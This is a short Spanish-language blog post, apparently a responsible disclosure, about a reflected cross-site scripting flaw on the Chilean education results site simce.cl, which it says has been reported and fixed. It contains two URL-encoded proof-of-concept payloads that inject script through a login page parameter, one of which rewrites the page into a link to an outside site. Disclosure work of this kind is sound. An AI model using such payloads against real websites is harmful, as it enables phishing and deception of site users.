Vulnerabilidad XSS en simce.cl

Estado: Reparado (ultima revisión 26/06/2020)
Informada: Si, a CSIRT de gobierno (26/06/2020)

En la Agencia de Calidad de Educación, se están publicado en el sitio web www.simce.cl la información con los resultados educativos de los establecimientos educacionales de 2019.

Esta página web tiene un error de tipo XSS (Cross-site scripting), este tipo de errores no daña el contenido del servidor pero se presta para engañar a los usuarios. Este en particular permite armar URL maliciosas que ejecutan códigos de javascript en el navegador del usuario.

Acá dos ejemplos de uso de dichas URL

https://www.simce.cl/comun/login/index.php?rbd=%3C%2Fscript%3E%3Cscript%3Ealert(100)%3B%3C%2Fscript%3E%3Cscript%3E

https://www.simce.cl/comun/login/index.php?rbd=%3C%2Fscript%3E%3Cscript%3E$(%20%22div%22%20).first().html(%22%3Ca%20href=%27https://liberumcode.org/test/%27%3E%3Ch1%20align=center%3E%3Cfont%20color=white%3EVer%20m%C3%A1s…%3C/h1%3E%3C/a%3E%22)%3B%3C%2Fscript%3E%3Cscript%3E

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.